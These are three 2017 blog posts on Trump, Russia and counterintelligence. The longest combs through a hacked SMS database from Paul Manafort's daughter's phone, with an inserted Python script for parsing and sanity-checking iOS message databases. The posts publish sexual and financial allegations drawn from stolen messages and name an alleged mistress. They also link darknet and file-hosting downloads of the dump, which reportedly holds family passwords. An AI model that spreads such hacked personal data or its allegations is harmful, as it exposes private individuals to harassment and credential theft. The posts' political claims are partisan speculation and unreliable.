Trump did win, however, and at that time it was in Putin's interest to cater to the man, to play him with praise and friendship in order to curry that favor. The reciprocal praise and love by Trump throughout the candidacy and into the presidency has been odd as well and plays to the whole 'kompromat' story too. For this piece I am not going to stray too far into the kompromat theory at the Trump level (another day soon), but it has to be mentioned here that at the very least there seemed to be a bromance between them, for whatever reasons. Likely, on both parts, at the base of it was the idea that if they are friends they can do deals together, which is what Trump had said on more than one occasion. This idea plays for me outside the kompromat thing because this is Trump after all (The Art of the Deal etc.), but on Putin's part it was a contingency plan. Putin's goal was to cause as much fractiousness as possible in the elections and to unbalance the US as he perceived Clinton had done in Russia, and he succeeded.

Now that Clinton was out and Trump was in, Putin likely thought that it would be smooth sailing, but he should have had a psychological monograph or assessment on Trump before assuming so. It seems that they did not and have been compiling one since February, after the win and the spiral since then. This is where the blowback starts, as well as the possible wins for Putin. On the blowback side, an uncontrolled Trump could lead to actual crazy actions that would impede Putin's goals. What if Trump decides to go all out and attempt to block his actions in Ukraine? What if Trump does an about-face on NATO? What if Trump just goes off the deep end and starts wars with proxies of Russia that would complicate Putin's plans for regional control and power? All of these things have to be taken into account after the administration's rocky, to say the least, fits and starts these forty days or so. Add to this all of the attention by the media and the populace, who are now asking for independent investigations into the ties between Trump and Russia pre-election, and you have heat. This heat is anathema to Putin's goals here and thus it is blowback for him. He has been distancing himself from Trump, and if the sudden unexplained deaths of certain Russians are any indication, he has been cleaning up loose ends as well. But these things lead back to the kompromat, and I am saving that for later.

Anyway, let's look at the upside of the Trump instability for Putin. Trump is a wild card, and his consistent instability is causing pushback here in the US that may lead to serious investigations of him, his minions, and all of their connections to Russian money, as well as the whole Emoluments issue. Lawsuits are being formed and registered, and the notion of an independent counsel for the Russia investigation has been gaining momentum. With all of this friction, the wheels of US foreign policy have been slowed as well. Suffice it to say that with all that is happening, it would be easy to fail to respond properly to actions taking place in the world, and for there to be no real outcry to respond to them, because we have all been thrust into self-introspection and a certain protectionist mentality. With this slack space to work in, even with Trump being an unpredictable and uncontrolled asset of the Kremlin, Putin would have room to move his agenda forward rather unhindered.

Once again, the 'Wilderness of Mirrors' can lead one to inaction because you just cannot tell what is real anymore and who is telling the truth. With Trump and his outlandish tweets (say, accusing Obama of a "wire tapp" on Trump Tower) it is hard to tell what he believes and what he is maybe trying to throw shade on to unbalance us all. Putin might seek to enhance this behavior as well as use it to his advantage. I would expect more disinformation (fake news) that may well end up in the president's tweet stream, and not just stuff about internal politics here in the US. The goal overall is to keep us unbalanced, because an unbalanced nation is a nation trapped in amber, and a nation weakened to inaction is exactly what Putin needs to succeed... even with blowback.

K.

 

Written by Krypt3ia

2017/03/07 at 14:26

“Wilderness of Mirrors”

leave a comment »

screenshot-from-2017-03-06-07-40-31

With all of the crazed tweets over the weekend from 45, I thought it would be appropriate to acquaint my readers with the notion of the "Wilderness of Mirrors" as James Jesus Angleton put it. Angleton is famous for his paranoia and his actions during the time he was chief of counterintelligence at the CIA from 1954 to 1975. Today we are in an unprecedented time of national intrigue, with our very nation's political system at stake over the issues surrounding the hack of the DNC, the manipulation of the US election process, and now the allegations and insinuations that the Trump campaign may have colluded with Russia. All of these things now fall under the auspices of counterintelligence, in that there are actors within our government who may be compromised and have been either witting or unwitting accomplices to a foreign power's manipulation of our national transition of power. What's more, these same individuals may in fact be assets of that foreign power while they are in power within the White House and elsewhere within the new administration.

Take a breath there and contemplate that statement.

We potentially have reached, as a reality today, what I personally thought was only a movie plot line. There are actual reasons to question whether or not the President of the US today may be a witting or unwitting asset of the Russian state. There may be reason to believe that the minions of the new President may also be assets of the Russian state, and to make it even worse we have seen a litany of lies and half-truths given by these people, and their dissembling has been caught by the Fourth Estate, which has held them accountable. While there is no smoking gun yet, there is a lot to parse out with every morning's headlines in the Times and other papers of record, but I would like to lift the curtain a little for you on the counterintel side. If you are gonna play this game at home you need a primer on counterintelligence and the 'Wilderness of Mirrors'.

When Angleton made the comment on the wilderness of mirrors he was referring to his own deep paranoia and the nature of counterintel. You have spies upon spies, and you must determine who they work for in reality. As the chief of counterintelligence it was Angleton's job to assume that assets and agents within his own organization were in fact double agents or even triple agents. It was Angleton's job to seek the truth of what his officers were telling him in intelligence reports and of what their assets were saying, in a time when the great game was at its highest point with the USSR. In essence, and this was his personality anyway, he had to assume at all times that there was compromise within his organization and to determine which assets were doubles and who they were really working for.

Now, in the current situation we are going through with 45 and the Russian efforts to destabilize the United States, there is no internal mole hunt that we have heard about within the halls of the CIA, but there is a counterintelligence operation going on at least at the FBI concerning all the players we are hearing about in the news and likely other names we have not heard. The current players you know are:

  • Paul Manafort (Worked for Yanukovich/Had affairs/Money troubles/Access to slush funds)
  • Trump (No tax returns/business with Russia/Love of Putin)
  • Jeff Sessions (Lied about meeting Russian Ambassador twice at least)
  • Michael Flynn (Lied about talking to Russian ambassador to Pence and everyone else)
  • Carter Page (Business with Russia and seems disposed to them)
  • Jared Kushner (Revelations of meeting with Russian ambassador with Sessions)
  • Roger Stone (May have handed over DNC emails to Wikileaks physically)
  • Un-named others TBD

There are likely more to be named as we go along, but you get the gist. The people in the inner circle of the current president's campaign, and those he then added to his administration, all seem to have had regular contact with the Russian government pre-election and post. Not only are they talking to Russian emissaries but, according to the IC, they are talking to Russian intelligence officers. This is not a good thing even if they were unwitting assets of the Russian intelligence apparatus. To lie about these contacts only makes the problem worse for the state and places more suspicion on them all, which leads to the wilderness of mirrors that the Fourth Estate is amplifying with its reporting (which it should be doing) on the leaks that are coming out of the IC. Leaks, mind you, to my mind are a means to an end to get the word out, because if they did not happen the admin would attempt to bury them forever. To wit, we have agents of foreign powers and people within the admin who are all lying about their connections and discussions. This is a counterintelligence operation and potentially a mole hunt. Do we believe the people who have been sources for the Steele notes? Or do we think that maybe they are telling tales to muddy the waters even more? Since some of these people seem to be dying conveniently, are they being killed off by Putin for talking and telling the truth, or are they just being killed to muddy the waters some more?

This is how you have to approach this. No one is telling the truth and you have to discern what the truth of it all really is. Who do you believe?

We are in the wilderness of mirrors, kids. Look at the news and try to parse out what is truth and what is fiction. It makes it even worse when there are factions out there like Alex Jones and the SVR that would like you to believe wild stories, and disinformation campaigns set out to further their own agendas. All of this then, in a completely inconceivable twist today, is re-tweeted by the president of this country, who often does so as a diversion (one hopes) or actually believes these things (much worse, for he may be mentally deranged), which unbalances us all. We are now all in Angleton's shoes trying to determine what is truth today, and this is one of the most destabilizing things happening to the United States populace and government. I want you all to understand this as you watch or read the news with these revelations, specifically now that we have reached peak crazy with Trump saying that the former President ordered a FISA warrant on him and the campaign in 2016. There are many issues here to consider, and if in fact the IC had intel that the candidate and his minions were in touch with Russian intelligence 'constantly', then what actions would the IC and the president have at their command to determine whether this was in fact true?

The recent accusation by the current president may be complete lunacy and the product of his own reading or watching of conspiracy sites, or it may have some basis in fact. There may not have been a FISA warrant, but friendly foreign intelligence agencies, monitoring not only Russia but, by their outside mandate, the conversations of the current president and his people, "might" have some telling information. Maybe they in fact got the conversations and there was no smoking gun, but instead the conversations looked suspect and more digging was required. Perhaps then some group like the FIVE EYES passed along this information and it is still being worked by the IC here in the US?

‘Wilderness of Mirrors’, kids.

Ponder that.

K.

Written by Krypt3ia

2017/03/06 at 13:48

Kompromat

with 8 comments

screenshot-from-2017-03-03-07-09-21

I feel dirty…

Why?

Because I have been going through the messages from Paul Manafort's daughter's iPhone SQLite database, that's why. I feel dirty more so because there are revelations in there that, if true, could be evidence of potential kompromat on Manafort while he was working in Ukraine. The SQLite database as far as I can tell is real, and in fact Manafort himself confirmed to Politico, on the record, that his daughter's phone was hacked, so there is that. The question then becomes, did someone tamper with or create this SQLite db? In looking at this so far, I cannot say that I think it was created whole cloth or that it has been edited in a way to add these allegations, but I have only done a cursory forensic look at it. What I ended up doing was looking more closely at the chats since Politico went on record after they lifted things from this blog. Yesterday I went through all the back and forth and found many a salacious thing. Cutting to the chase though, I found conversations between Manafort's daughter and someone about how her father was having an affair with a girl younger than one of his daughters.
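A minimal version of that cursory forensic look, as an added example that is not part of the original post and not the author's tooling. It opens an iOS Messages database (the sms.db found in iTunes backups and phone dumps), joins each message to the counterpart handle, converts Apple's 2001-based timestamps, runs a keyword search, and applies the cheap sanity checks you would want before trusting the contents: SQLite's own integrity check, ROWID gaps (deleted texts, normal on their own but worth noting when they cluster around the interesting content) and timestamps that run backwards relative to insertion order. The column names used (message.ROWID, text, date, is_from_me, handle_id; handle.ROWID, id) are the standard iOS schema; the seconds-versus-nanoseconds date handling is an assumption documented in the code; the rows in build_sample_db() are constructed stand-ins, not data from the leak.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# iOS Messages (sms.db) stores dates as an offset from 2001-01-01 UTC.
APPLE_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def apple_to_utc(raw):
    """Convert a message.date value to an aware UTC datetime.

    Older iOS (the era of this dump) stores seconds; iOS 11+ stores
    nanoseconds. Assumption: any value above 1e11 cannot be seconds
    (that would be past year 5000), so treat it as nanoseconds.
    """
    if raw is None:
        return None
    if raw > 10**11:
        raw = raw / 1e9
    return APPLE_EPOCH + timedelta(seconds=raw)


def load_messages(conn):
    """Join each message to its counterpart handle (phone number or e-mail)."""
    sql = """
        SELECT m.ROWID, m.date, m.is_from_me, h.id, m.text
        FROM message AS m
        LEFT JOIN handle AS h ON h.ROWID = m.handle_id
        ORDER BY m.ROWID
    """
    msgs = []
    for rowid, date, from_me, counterpart, text in conn.execute(sql):
        msgs.append({
            "rowid": rowid,
            "ts": apple_to_utc(date),
            "from_me": bool(from_me),
            "counterpart": counterpart,
            "text": text or "",
        })
    return msgs


def tamper_indicators(conn, msgs):
    """Cheap sanity checks before trusting the contents.

    None of these prove tampering; they flag rows worth a closer look.
    ROWID gaps are normal (deleted texts), but a timestamp that runs
    backwards relative to ROWID order is unusual for a database written
    by a live device.
    """
    findings = []
    (status,) = conn.execute("PRAGMA integrity_check").fetchone()
    if status != "ok":
        findings.append(f"integrity_check: {status}")
    prev = None
    for m in msgs:
        if prev is not None:
            if m["rowid"] - prev["rowid"] > 1:
                findings.append(f"rowid gap {prev['rowid']}->{m['rowid']}")
            if m["ts"] and prev["ts"] and m["ts"] < prev["ts"]:
                findings.append(
                    f"rowid {m['rowid']} dated before rowid {prev['rowid']}")
        prev = m
    return findings


def grep_messages(msgs, *needles):
    """Case-insensitive keyword search over message bodies."""
    needles = [n.lower() for n in needles]
    return [m for m in msgs if any(n in m["text"].lower() for n in needles)]


def build_sample_db():
    """Constructed stand-in for an sms.db; the rows are invented, not from
    the leak. Only the columns the queries above touch are modelled."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE handle (ROWID INTEGER PRIMARY KEY, id TEXT);
        CREATE TABLE message (ROWID INTEGER PRIMARY KEY, text TEXT,
                              date INTEGER, is_from_me INTEGER,
                              handle_id INTEGER);
        INSERT INTO handle VALUES (1, '+15550100'), (2, 'friend@example.com');
    """)
    base = 450_000_000  # seconds after 2001-01-01, i.e. April 2015
    conn.executemany("INSERT INTO message VALUES (?, ?, ?, ?, ?)", [
        (1, "did you see the new apartment listing", base, 1, 1),
        (2, "yeah, who is paying for that", base + 60, 0, 1),
        # ROWID 3 missing: looks like a deleted text
        (4, "not the clients, they still owe him", base + 180, 1, 1),
        # nanosecond-style timestamp, as a newer iOS would write it
        (5, "lunch?", (base + 240) * 10**9, 0, 2),
        # dated an hour earlier than the rows before it
        (6, "backdated row", base - 3600, 1, 2),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    # Real use: conn = sqlite3.connect("file:sms.db?mode=ro", uri=True)
    db = build_sample_db()
    messages = load_messages(db)
    for m in messages:
        who = "me" if m["from_me"] else m["counterpart"]
        print(f"{m['rowid']:>4} {m['ts']:%Y-%m-%d %H:%M:%S} {who:>20}: {m['text']}")
    for hit in grep_messages(messages, "apartment", "owe"):
        print("hit:", hit["rowid"], hit["text"])
    for f in tamper_indicators(db, messages):
        print("flag:", f)
```

Open a real dump read-only (the uri form in the comment) and work from a copy: SQLite will happily rewrite the file's journal or WAL on first open, which destroys the hash you would otherwise want to record before anyone argues about whether the file was edited. Passing all of these checks says nothing about whether the chats are genuine; it only says the file was not assembled carelessly.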

screenshot-from-2017-03-04-03-20-44

What is even more interesting is the allegation here that not only was Manafort having this affair, but that the girl (who is named in the chats, and whom I have backstopped as in fact being in Ukraine at the time mentioned, while Manafort was there) was, of all things, described by Paul as some "Russian friends" daughter. Though the text below states they don't really think that the girl is Russian, there are more downstream that talk about her father and her family and ties to Russia (maybe), but the sick burn here is if she is, well, that is a pretty direct tie to the country that might, ya know, use that as kompromat on Pauly, eh?

screenshot-from-2017-03-03-12-05-41

Even the idea that Paul may have had a young trophy mistress is enough for blackmail, but the texts go on to describe her travel with him all over the world, including to Ukraine while he was working there. So, if the Russians did not have access to her or had placed her in the proximity of Paul, this certainly would have been information they would not have passed up on to use. So, once more, if the SQLite database is legit and the information presented here is on the mark, it is quite possible that Manafort was, at least in this instance, easily vulnerable to compromise by the Russians.

screenshot-from-2017-03-03-08-16-42

As the chats went on though, it seems that the new girl was also straining Manafort's money because he was being extravagant with her. As you can see from above, he allegedly rented her a house in the Hamptons by his own for a summer and bought a NYC apartment for her to be in. All of this money being spent, as it happens, was concurrent with his daughter's wedding coming up and Ukraine not paying him for his services. I believe the timing of this was when Yanukovich was about to flee to Russia and those ledgers with the monies supposed to be paid to Manafort were dug up, which in the end he did not get. All of this could lead to further compromise, right? What if all the money trouble and girl trouble put Paul in a bind and the Russians said "We have a way to make things better! You know this Trump guy, right?"

You see where I am going don’t you?

screenshot-from-2017-03-03-11-40-37

The above text was mentioned in the Politico story, but here is the raw text. So if this is all true, it seems to me that it and much more (allegations of sex things that I will not talk about) would, in my book, be quite enough to land one in a dossier like the one Steele put together on Trump. All of it, all the sordid details, would be things that the SVR/GRU would LOVE to know about and leverage, wouldn't you say? But wait, it gets better! It seems that Paul took a page from the Petraeus playbook and tried the old "draft email" technique popular with television terrorists!

screenshot-from-2017-03-03-11-48-04

This evidently was working for him until the daughter saw it on his phone. She mentioned a sketchy email, and that kinda jibes with that email server and domain I found before, huh? Maybe that server is how they are communicating? I would love to see what is in that email server; I wonder who else he has been emailing on there? Anyway, there is a lot more in the db that is pretty damning, as well as all kinds of personal info like passwords to systems, wireless APs and other things owned and operated by the Manafort daughter and immediate family. There are also quite a few mentions of Trump and how, at one point, it even seems that Manafort was messing about with porn on a Trump laptop or some such thing. I leave all the really dirty things to Politico and any other media source that has the wherewithal to locate the SQLite dump and open it.

As for me, I have a copy, and those law enforcement types who want it can ask if they have the interest. I have tried to get the Anons who posted the db to give me more, but I am thinking that their statement (see top of page) was an allusion to all the dirt in that SQLite db... which Politico, if they ever really got the db, which I doubt now, would have been ravening to publish.

Stupid fucks.

L8r

K.

EDIT:

I just wanted to cover the idea that this is maybe disinfo and thus placed out there for people to find and publish to muddy the waters. While that is possible, and we are dealing with possible nation-state actors, in looking at the db and the contents I lean towards this being real data. The chats are very fluid and read properly, not as if some anon has just put this together inside of the db. The facts, on backstopping the names and dates and locations, have also checked out, so I think it is legit. The fact that Manafort copped to the hack being real also adds to the credibility of the data.

That being said... you never know, so I thought I would make that caveat. Anything is possible with a nation-state player. It is now the job of the news orgs and the LE set to look into this and to determine whether the data is true, as well as whether this could possibly have been part of the picture where Manafort and the Russia connections to Trump and his campaign may have their intersection.

UPDATE: 3/7/17

The young woman asserted to be the mistress in this morass has deleted her profiles online as of today. I have not released her name, so someone must have called her from a news service. Someone else obviously learned how to open the SQLite database. Sorry miss, but the internet does not forget, so your stuff will be out there in cache in perpetuity.

UPDATE: 3/11/17

CNN has finally published something on the dump, but they ONLY went after the weakest bit of data in there. A comment by his daughter is just that, a comment, but they went with that when they could have gone with the provable facts that he has/had a mistress in Andriana and that he bought her a place in NYC as well as spent lavishly on her. All this while he was not getting paid by Ukraine and was then making odd loans.

What I was getting at all along was that this is all provable information; I backstopped it, and now the mistress has deleted her online profiles! Come on CNN, stop being pussies!

http://www.cnn.com/2017/03/10/politics/ukraine-manafort-hacked-texts/index.html

So, I have decided to dump the dump for you all to look at. Go. Download. Research.

http://264nglqbtqlabsxl.onion/manafort-clan-secrets-revealed-pt-1-sql-sms-etc/ <-- darknet site dump

Links to clearnet download of data

https://mega.nz/#!vhdEGKKC!scYBsRyrPy1-8nDB8_f4Ij5sS8OMhWMLSWJdUtHuSCA

https://mega.nz/#!D1M1HJQK!Oc2pF0lJ2usBBy0IkujE5EHqU6UhBQ5mHttURvxJqYw

 

Written by Krypt3ia

2017/03/04 at 09:29

Posted in Manafort